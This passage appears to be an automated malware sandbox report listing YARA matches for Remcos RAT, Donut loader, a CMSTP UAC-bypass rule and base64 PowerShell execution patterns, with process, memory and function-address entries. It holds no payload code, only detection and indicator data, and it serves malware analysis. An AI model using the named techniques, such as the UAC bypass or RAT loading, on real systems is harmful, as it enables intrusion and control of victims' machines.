              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: cmd.exeProcess created: 47

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.3013528096.000000000A691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1617304143.0000000005E3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2049158626.0000000005AC9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000025.00000002.2204277686.0000000005B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000025.00000002.2207744918.0000000005C38000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000044.00000002.3579093433.000000000570A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002F.00000002.2567062053.0000000005E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.2768925808.0000000006049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.1954879195.000000000B599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2046612983.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002A.00000002.2517437767.000000000BB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.1754524729.0000000005D0E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002A.00000002.2381301082.0000000006468000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003F.00000002.3285696458.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000014.00000002.1753263642.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000004B.00000002.3916357239.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000050.00000002.4155888640.0000000005A5D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1616821481.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003A.00000002.3015761795.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.1787537306.000000000A471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000044.00000002.3628599649.00000000057AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1909103811.0000000005F3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000050.00000002.4122586457.0000000005A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1630733109.000000000B581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.2781991173.00000000060E9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000004B.00000002.3953316191.0000000005F3C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1906868273.0000000005ED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003A.00000002.3037691114.0000000005CF9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003F.00000002.3306381438.0000000005DE9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00401806 NtdllDefWindowProc_W,7_2_00401806
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004018C0 NtdllDefWindowProc_W,7_2_004018C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004016FD NtdllDefWindowProc_A,8_2_004016FD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004017B7 NtdllDefWindowProc_A,8_2_004017B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00402CAC NtdllDefWindowProc_A,9_2_00402CAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00402D66 NtdllDefWindowProc_A,9_2_00402D66
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044B0407_2_0044B040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0043610D7_2_0043610D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004473107_2_00447310
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044A4907_2_0044A490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040755A7_2_0040755A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0043C5607_2_0043C560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044B6107_2_0044B610
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044D6C07_2_0044D6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004476F07_2_004476F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044B8707_2_0044B870
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044081D7_2_0044081D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004149577_2_00414957
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004079EE7_2_004079EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00407AEB7_2_00407AEB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044AA807_2_0044AA80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00412AA97_2_00412AA9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00404B747_2_00404B74
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00404B037_2_00404B03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044BBD87_2_0044BBD8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00404BE57_2_00404BE5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00404C767_2_00404C76
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00415CFE7_2_00415CFE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00416D727_2_00416D72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00446D307_2_00446D30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00446D8B7_2_00446D8B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00406E8F7_2_00406E8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004050388_2_00405038
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041208C8_2_0041208C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004050A98_2_004050A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040511A8_2_0040511A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043C13A8_2_0043C13A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004051AB8_2_004051AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004493008_2_00449300
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040D3228_2_0040D322
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044A4F08_2_0044A4F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043A5AB8_2_0043A5AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004136318_2_00413631
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004466908_2_00446690
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044A7308_2_0044A730
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004398D88_2_004398D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004498E08_2_004498E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044A8868_2_0044A886
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043DA098_2_0043DA09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438D5E8_2_00438D5E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00449ED08_2_00449ED0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041FE838_2_0041FE83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00430F548_2_00430F54
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004050C29_2_004050C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004014AB9_2_004014AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004051339_2_00405133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004051A49_2_004051A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004012469_2_00401246
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040CA469_2_0040CA46
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004052359_2_00405235
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004032C89_2_004032C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004016899_2_00401689
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00402F609_2_00402F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.3013528096.000000000A691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1617304143.0000000005E3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000020.00000002.2049158626.0000000005AC9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000025.00000002.2204277686.0000000005B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
